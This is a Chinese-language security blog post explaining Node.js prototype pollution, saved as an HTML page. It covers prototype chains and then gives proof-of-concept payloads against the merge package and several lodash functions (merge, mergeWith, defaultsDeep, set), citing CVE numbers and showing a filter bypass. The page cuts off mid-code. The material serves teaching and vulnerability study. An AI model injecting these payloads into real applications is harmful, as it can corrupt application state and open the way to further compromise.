

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="springtime">
  <meta name="keywords" content="">
  
    <meta name="description" content="0x00 原型链与原型链继承原型链原型链污染(prototype pollution)是js独有的安全问题，其原因主要是因为js中几乎所有类的所有属性都可以公开访问和修改，通过修改多个可控变量去覆盖__proto__属性即可污染其它类，即如果能够控制并修改一个对象的原型，就可以影响到所有和这个对象同一个原型的对象。 原型链污染发生的两个场景是：  不安全的对象递归合并 按路径定义属性。  在js中">
<meta property="og:type" content="article">
<meta property="og:title" content="nodejs原型链污染">
<meta property="og:url" content="http://example.com/2022/12/30/nodejs%E5%8E%9F%E5%9E%8B%E9%93%BE%E6%B1%A1%E6%9F%93/index.html">
<meta property="og:site_name" content="spring&#39;s blog">
<meta property="og:description" content="0x00 原型链与原型链继承原型链原型链污染(prototype pollution)是js独有的安全问题，其原因主要是因为js中几乎所有类的所有属性都可以公开访问和修改，通过修改多个可控变量去覆盖__proto__属性即可污染其它类，即如果能够控制并修改一个对象的原型，就可以影响到所有和这个对象同一个原型的对象。 原型链污染发生的两个场景是：  不安全的对象递归合并 按路径定义属性。  在js中">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2022-12-30T09:34:02.000Z">
<meta property="article:modified_time" content="2023-02-01T07:26:24.000Z">
<meta property="article:author" content="springtime">
<meta property="article:tag" content="原型链污染">
<meta property="article:tag" content="nodejs">
<meta name="twitter:card" content="summary_large_image">
  
  
  
  <title>nodejs原型链污染 - spring&#39;s blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.2","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>springtime</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                Home
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                Archives
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                Categories
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                Tags
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                About
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="nodejs原型链污染"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2022-12-30 17:34" pubdate>
          Friday, December 30th 2022, 5:34 pm
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    

    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">nodejs原型链污染</h1>
            
            
              <div class="markdown-body">
                
                <h2 id="0x00-原型链与原型链继承"><a href="#0x00-原型链与原型链继承" class="headerlink" title="0x00 原型链与原型链继承"></a>0x00 原型链与原型链继承</h2><h3 id="原型链"><a href="#原型链" class="headerlink" title="原型链"></a>原型链</h3><p>原型链污染(<strong>prototype pollution</strong>)是js独有的安全问题，其原因主要是因为js中几乎所有类的所有属性都可以公开访问和修改，通过修改多个可控变量去覆盖<code>__proto__</code>属性即可污染其它类，即如果能够控制并修改一个对象的原型，就可以影响到所有和这个对象同一个原型的对象。</p>
<p>原型链污染发生的两个场景是：</p>
<ul>
<li><strong>不安全的对象递归合并</strong></li>
<li><strong>按路径定义属性</strong>。</li>
</ul>
<p>在js中每个实例对象object都有个原型对象，原型对象又有对应的原型对象，以此类推可构成<strong>原型链</strong>，层层向上知道第一个原型对象为null。</p>
<p>要访问一个实例对象的原型对象，有以下方式：</p>
<figure class="highlight elm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs elm"><span class="hljs-title">objectname</span>.[[proto<span class="hljs-keyword">type</span>]]<br><span class="hljs-title">objectname</span>.proto<span class="hljs-keyword">type</span><br><span class="hljs-title">objectname</span>[<span class="hljs-string">&quot;__proto__&quot;</span>]<br><span class="hljs-title">objectname</span>.__proto__<br><span class="hljs-title">objectname</span>.constructor.proto<span class="hljs-keyword">type</span><br></code></pre></td></tr></table></figure>

<p>在定义类构造函数的时候，有一个预定义属性<code>prototype</code>，他就是一个原型对象。在实例化对象的时候会生成一个属性<code>__proto__</code>，它所指向的便是这个对象构造函数的prototype，例如</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs javascript"><span class="hljs-keyword">function</span> <span class="hljs-title function_">Class1</span>(<span class="hljs-params"></span>)&#123;<br><span class="hljs-variable language_">this</span>.<span class="hljs-property">var</span> = <span class="hljs-literal">null</span><br>&#125;<br><span class="hljs-keyword">function</span> <span class="hljs-title function_">Class2</span>(<span class="hljs-params"></span>)&#123;<br><span class="hljs-variable language_">this</span>.<span class="hljs-property">var</span> = <span class="hljs-literal">null</span><br>&#125;<br><br><span class="hljs-comment">//将Class2的原型指向Class1</span><br><span class="hljs-title class_">Class2</span>.<span class="hljs-property"><span class="hljs-keyword">prototype</span></span> = <span class="hljs-title class_">Class1</span><br><span class="hljs-keyword">let</span> obj = <span class="hljs-keyword">new</span> <span class="hljs-title class_">Class2</span>()<br><br><span class="hljs-comment">//打印Class1</span><br><span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-string">`<span class="hljs-subst">$&#123;obj.__proto__&#125;</span>`</span>)<br></code></pre></td></tr></table></figure>

<h3 id="原型链继承"><a href="#原型链继承" class="headerlink" title="原型链继承"></a>原型链继承</h3><p>类在实例化的时候会拥有类自身<code>prototype</code>中的属性和方法，即<code>object</code>会继承其<code>__proto__</code>属性指向的原型对象的属性和方法，例如</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs javascript"><span class="hljs-keyword">function</span> <span class="hljs-title function_">Father</span>(<span class="hljs-params"></span>)&#123;<br>    <span class="hljs-variable language_">this</span>.<span class="hljs-property">last_name</span> = <span class="hljs-string">&quot;time&quot;</span><br>&#125;<br><br><span class="hljs-keyword">function</span> <span class="hljs-title function_">Son</span>(<span class="hljs-params"></span>)&#123;<br>    <span class="hljs-variable language_">this</span>.<span class="hljs-property">first_name</span> = <span class="hljs-string">&quot;spring&quot;</span><br>&#125;<br><br><span class="hljs-title class_">Son</span>.<span class="hljs-property"><span class="hljs-keyword">prototype</span></span> = <span class="hljs-keyword">new</span> <span class="hljs-title class_">Father</span>();<br><span class="hljs-keyword">let</span> son = <span class="hljs-keyword">new</span> <span class="hljs-title class_">Son</span>();<br><span class="hljs-comment">//打印Name:spring time</span><br><span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-string">`Name:<span class="hljs-subst">$&#123;son.first_name&#125;</span> <span class="hljs-subst">$&#123;son.last_name&#125;</span>`</span>)<br><br></code></pre></td></tr></table></figure>

<p>在输出last_name时，由于Son中没有此属性，于是到其原型对象<code>son.__proto__</code>，也就是Father实例中寻找，如果依然没找到，那么就继续到<code>son.__proto__.__proto__</code>寻找，直到找到为止，未找到返回<code>undefined</code>。</p>
<p>至此总结出几个要点：</p>
<ul>
<li>每个构造函数(<code>constructor</code>)都有一个原型对象(<code>prototype</code>)</li>
<li>对象的<code>__proto__</code>属性，指向类的原型对象<code>prototype</code></li>
<li>JavaScript使用<code>prototype</code>链实现继承机制</li>
</ul>
<h2 id="0x01-原型链污染"><a href="#0x01-原型链污染" class="headerlink" title="0x01 原型链污染"></a>0x01 原型链污染</h2><p>首先是json语法的一些规则：</p>
<ul>
<li>数据在名称&#x2F;值对中</li>
<li>数据由逗号分隔</li>
<li>花括号容纳对象</li>
<li>方括号容纳数组</li>
</ul>
<p>JSON键&#x2F;值对由<strong>键和值</strong>组成，<strong>键必须是字符串</strong>，值可以是字符串（string）、数值(number) 、对象（object）、数组（array）、true、false、null。</p>
<p>例如</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs javascript"><span class="hljs-keyword">var</span> object = &#123;<br>  <span class="hljs-string">&#x27;a&#x27;</span>: [&#123; <span class="hljs-string">&#x27;key1&#x27;</span>: <span class="hljs-number">2</span> &#125;, &#123; <span class="hljs-string">&#x27;key2&#x27;</span>: <span class="hljs-number">4</span> &#125;]<br>&#125;;<br></code></pre></td></tr></table></figure>

<p>首先看一个语句</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs javascript">object[a][b] = value<br></code></pre></td></tr></table></figure>

<p>如果我们能同时控制a、b、value的值，将a设置为<code>__proto__</code>，那么就可以给object的原型ProtoClass设置一个值为value的属性b，即使原型中没有b属性也可以添加进去，与此同时所有原型链中含有ProtoClass的对象也将增加属性b，这就是<strong>原型链污染</strong>。</p>
<h2 id="0x02-merge引发的污染"><a href="#0x02-merge引发的污染" class="headerlink" title="0x02 merge引发的污染"></a>0x02 merge引发的污染</h2><h3 id="example"><a href="#example" class="headerlink" title="example"></a>example</h3><p>一个简单的例子</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">function</span> <span class="hljs-title function_">merge</span>(<span class="hljs-params">target, source</span>) &#123;<br>    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">let</span> key <span class="hljs-keyword">in</span> source) &#123;<br>        <span class="hljs-keyword">if</span> (key <span class="hljs-keyword">in</span> source &amp;&amp; key <span class="hljs-keyword">in</span> target) &#123;<br>            <span class="hljs-title function_">merge</span>(target[key], source[key])<br>        &#125; <span class="hljs-keyword">else</span> &#123;<br>            target[key] = source[key]<br>        &#125;<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>merge函数对数组的键名进行了递归合并操作，注意<code>target[key] = source[key]</code>，如果我们能控制键名<code>source</code>为<code>__proto__</code>，同时利用target为其赋值，就可以为source的原型对象添加属性实现污染。</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs javascript"><span class="hljs-keyword">let</span> o1 = &#123;&#125;<br><span class="hljs-keyword">let</span> o2 = <span class="hljs-title class_">JSON</span>.<span class="hljs-title function_">parse</span>(<span class="hljs-string">&#x27;&#123;&quot;a&quot;: 1, &quot;__proto__&quot;: &#123;&quot;b&quot;: 2&#125;&#125;&#x27;</span>)<br><span class="hljs-title function_">merge</span>(o1, o2)<br><span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(o1.<span class="hljs-property">a</span>, o1.<span class="hljs-property">b</span>)<br><br>o3 = &#123;&#125;<br><span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(o3.<span class="hljs-property">b</span>)<br><br><span class="hljs-comment">//输出</span><br><span class="hljs-comment">//1 2</span><br><span class="hljs-comment">//2</span><br></code></pre></td></tr></table></figure>

<p>可见o3被成功污染，实际上由于o1、o2、o3原型类统一，它们都会拥有属性b。</p>
<p>注意如果令b等于<code>&#123;a: 1, &quot;__proto__&quot;: &#123;b: 2&#125;&#125;</code>，那么对b的键名进行遍历的时候就会忽略<code>__proto__</code>不会把它看作键名，因为<code>__proto__</code>被看作是原型了，所以遍历后的键名是a、b。</p>
<p>因此为了使<code>__proto__</code>被解析为键名，我们需要配合JSON.parse。</p>
<h3 id="merge-recursiveMerge"><a href="#merge-recursiveMerge" class="headerlink" title="merge.recursiveMerge"></a>merge.recursiveMerge</h3><p>漏洞编号CVE-2020-28499，poc如下，需要引入<a href="mailto:&#x6d;&#101;&#x72;&#103;&#x65;&#x40;&#x32;&#x2e;&#49;&#x2e;&#x30;">&#x6d;&#101;&#x72;&#103;&#x65;&#x40;&#x32;&#x2e;&#49;&#x2e;&#x30;</a>(ver&lt;2.1.1)</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs javascript"><span class="hljs-keyword">const</span> merge = <span class="hljs-built_in">require</span>(<span class="hljs-string">&#x27;merge&#x27;</span>);<br><br><span class="hljs-keyword">const</span> payload2 = <span class="hljs-title class_">JSON</span>.<span class="hljs-title function_">parse</span>(<span class="hljs-string">&#x27;&#123;&quot;x&quot;: &#123;&quot;__proto__&quot;:&#123;&quot;polluted&quot;:&quot;yes&quot;&#125;&#125;&#125;&#x27;</span>);<br><br><span class="hljs-keyword">let</span> obj1 = &#123;<span class="hljs-attr">x</span>: &#123;<span class="hljs-attr">y</span>:<span class="hljs-number">1</span>&#125;&#125;;<br><br><span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-string">&quot;Before : &quot;</span> + obj1.<span class="hljs-property">polluted</span>);<br>merge.<span class="hljs-title function_">recursive</span>(obj1, payload2);<br><span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-string">&quot;After : &quot;</span> + obj1.<span class="hljs-property">polluted</span>);<br><span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-string">&quot;After : &quot;</span> + &#123;&#125;.<span class="hljs-property">polluted</span>);<br><br><span class="hljs-comment">//输出</span><br><span class="hljs-comment">//Before : undefined</span><br><span class="hljs-comment">//After : yes</span><br><span class="hljs-comment">//After : yes</span><br></code></pre></td></tr></table></figure>

<p>调试过程中发现调用链是<code>recursive -&gt; _merge -&gt; _recursiveMerge</code>，而<code>_recursiveMerge</code>中存在递归合并:</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">function</span> <span class="hljs-title function_">_recursiveMerge</span>(<span class="hljs-params">base, extend</span>) &#123;<br>    <span class="hljs-keyword">if</span> (!<span class="hljs-title function_">isPlainObject</span>(base))<br>        <span class="hljs-keyword">return</span> extend;<br>    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">var</span> key <span class="hljs-keyword">in</span> extend)<br>        base[key] = (<span class="hljs-title function_">isPlainObject</span>(base[key]) &amp;&amp; <span class="hljs-title function_">isPlainObject</span>(extend[key])) ?<br>            <span class="hljs-title function_">_recursiveMerge</span>(base[key], extend[key]) :<br>            extend[key];<br>    <span class="hljs-keyword">return</span> base;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>值得注意的是<code>_merge</code>方法有一处过滤，过滤了一些关键词</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">if</span> (key === <span class="hljs-string">&#x27;__proto__&#x27;</span> &#124;&#124; key === <span class="hljs-string">&#x27;constructor&#x27;</span> &#124;&#124; key === <span class="hljs-string">&#x27;prototype&#x27;</span>)<br>   <span class="hljs-keyword">continue</span>;<br></code></pre></td></tr></table></figure>

<p>但是检查的范围仅仅是key，我们再嵌套一层数组即可，也就是payload：<code>&#123;&quot;x&quot;: &#123;&quot;__proto__&quot;:&#123;&quot;polluted&quot;:&quot;yes&quot;&#125;&#125;&#125;</code></p>
<h2 id="0x03-Lodash中的污染"><a href="#0x03-Lodash中的污染" class="headerlink" title="0x03 Lodash中的污染"></a>0x03 Lodash中的污染</h2><h3 id="lodash-defaultsDeep"><a href="#lodash-defaultsDeep" class="headerlink" title="lodash.defaultsDeep"></a>lodash.defaultsDeep</h3><p>漏洞编号CVE-2019-10744，需要引入<a href="mailto:&#x6c;&#111;&#100;&#x61;&#115;&#104;&#x40;&#52;&#x2e;&#49;&#55;&#x2e;&#x31;&#x31;">&#x6c;&#111;&#100;&#x61;&#115;&#104;&#x40;&#52;&#x2e;&#49;&#55;&#x2e;&#x31;&#x31;</a>(ver&lt;4.17.12)，poc如下</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">const</span> mergeFn = <span class="hljs-built_in">require</span>(<span class="hljs-string">&#x27;lodash&#x27;</span>).<span class="hljs-property">defaultsDeep</span>;<br><span class="hljs-keyword">const</span> payload = <span class="hljs-string">&#x27;&#123;&quot;constructor&quot;: &#123;&quot;prototype&quot;: &#123;&quot;whoami&quot;: &quot;Vulnerable&quot;&#125;&#125;&#125;&#x27;</span><br><br><span class="hljs-keyword">function</span> <span class="hljs-title function_">check</span>(<span class="hljs-params"></span>) &#123;<br>    <span class="hljs-title function_">mergeFn</span>(&#123;&#125;, <span class="hljs-title class_">JSON</span>.<span class="hljs-title function_">parse</span>(payload));<br>    <span class="hljs-keyword">if</span> ((&#123;&#125;)[<span class="hljs-string">`a0`</span>] === <span class="hljs-literal">true</span>) &#123;<br>        <span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-string">`Vulnerable to Prototype Pollution via <span class="hljs-subst">$&#123;payload&#125;</span>`</span>);<br>    &#125;<br>  &#125;<br><br><span class="hljs-title function_">check</span>();<br><br><span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-title class_">Object</span>.<span class="hljs-property">whoami</span>);<br><span class="hljs-comment">//打印Vulnerable</span><br></code></pre></td></tr></table></figure>

<h3 id="lodash-merge"><a href="#lodash-merge" class="headerlink" title="lodash.merge"></a>lodash.merge</h3><p>这里使用ver 4.17.4才好使。</p>
<p>与前面提到的merge相似，poc如下</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">var</span> lodash= <span class="hljs-built_in">require</span>(<span class="hljs-string">&#x27;lodash&#x27;</span>);<br><span class="hljs-keyword">var</span> payload = <span class="hljs-string">&#x27;&#123;&quot;__proto__&quot;:&#123;&quot;polluted&quot;:&quot;yes&quot;&#125;&#125;&#x27;</span>;<br><br><span class="hljs-keyword">var</span> a = &#123;&#125;;<br><span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-string">&quot;Before polluted: &quot;</span> + a.<span class="hljs-property">polluted</span>);<br>lodash.<span class="hljs-title function_">merge</span>(&#123;&#125;, <span class="hljs-title class_">JSON</span>.<span class="hljs-title function_">parse</span>(payload));<br><span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-string">&quot;After polluted: &quot;</span> + a.<span class="hljs-property">polluted</span>);<br></code></pre></td></tr></table></figure>

<h3 id="lodash-mergeWith"><a href="#lodash-mergeWith" class="headerlink" title="lodash.mergeWith"></a>lodash.mergeWith</h3><p>漏洞编号CVE-2018-16487，相比于merge增加了一个参数<code>customizer</code>，作用是控制合并方式，若<code>customizer</code>未定义则依然由merge替代，因此事实上它对我们的利用方式没有影响，poc不变</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">var</span> lodash= <span class="hljs-built_in">require</span>(<span class="hljs-string">&#x27;lodash&#x27;</span>);<br><span class="hljs-keyword">var</span> payload = <span class="hljs-string">&#x27;&#123;&quot;__proto__&quot;:&#123;&quot;polluted&quot;:&quot;yes&quot;&#125;&#125;&#x27;</span>;<br><br><span class="hljs-keyword">var</span> a = &#123;&#125;;<br><span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-string">&quot;Before polluted: &quot;</span> + a.<span class="hljs-property">polluted</span>);<br>lodash.<span class="hljs-title function_">merge</span>(&#123;&#125;, <span class="hljs-title class_">JSON</span>.<span class="hljs-title function_">parse</span>(payload));<br><span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-string">&quot;After polluted: &quot;</span> + a.<span class="hljs-property">polluted</span>);<br></code></pre></td></tr></table></figure>

<h3 id="lodash-set"><a href="#lodash-set" class="headerlink" title="lodash.set"></a>lodash.set</h3><p>修改指定path(对象属性)的value(值)</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-title function_">set</span>(object, path, value)<br><span class="hljs-comment">//object (Object): 要修改的对象。</span><br><span class="hljs-comment">//path (Array&#124;string): 要设置的对象路径。</span><br><span class="hljs-comment">//value (*): 要设置的值。</span><br></code></pre></td></tr></table></figure>

<p>注意此方法会直接改变Object。例如给多层嵌套的属性c赋值</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">var</span> lodash= <span class="hljs-built_in">require</span>(<span class="hljs-string">&#x27;lodash&#x27;</span>);<br><span class="hljs-keyword">var</span> object = &#123; <span class="hljs-string">&#x27;a&#x27;</span>: [&#123; <span class="hljs-string">&#x27;b&#x27;</span>: &#123; <span class="hljs-string">&#x27;c&#x27;</span>: <span class="hljs-number">3</span> &#125; &#125;] &#125;;<br>lodash.<span class="hljs-title function_">set</span>(object, <span class="hljs-string">&#x27;a[0].b.c&#x27;</span>, <span class="hljs-number">4</span>);<br><span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(object.<span class="hljs-property">a</span>[<span class="hljs-number">0</span>].<span class="hljs-property">b</span>.<span class="hljs-property">c</span>);<br><span class="hljs-comment">//打印</span><br><span class="hljs-comment">//4</span><br></code></pre></td></tr></table></figure>

<p>跟一下源码，首先set调了baseSet</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">function</span> <span class="hljs-title function_">set</span>(<span class="hljs-params">object, path, value</span>) &#123;<br>  <span class="hljs-keyword">return</span> object == <span class="hljs-literal">null</span> ? object : <span class="hljs-title function_">baseSet</span>(object, path, value);<br>&#125;<br></code></pre></td></tr></table></figure>

<p>然后是castPath，stringToPath，最后也没有任何过滤，poc</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">var</span> lodash= <span class="hljs-built_in">require</span>(<span class="hljs-string">&#x27;lodash&#x27;</span>);<br><br><span class="hljs-keyword">var</span> object_1 = &#123; <span class="hljs-string">&#x27;a&#x27;</span>: [&#123; <span class="hljs-string">&#x27;b&#x27;</span>: &#123; <span class="hljs-string">&#x27;c&#x27;</span>: <span class="hljs-number">3</span> &#125; &#125;] &#125;;<br><span class="hljs-keyword">var</span> object_2 = &#123;&#125;<br><br><span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(object_1.<span class="hljs-property">whoami</span>);<br><span class="hljs-comment">//lodash.set(object_2, &#x27;object_2[&quot;__proto__&quot;][&quot;whoami&quot;]&#x27;, &#x27;Vulnerable&#x27;);</span><br>lodash.<span class="hljs-title 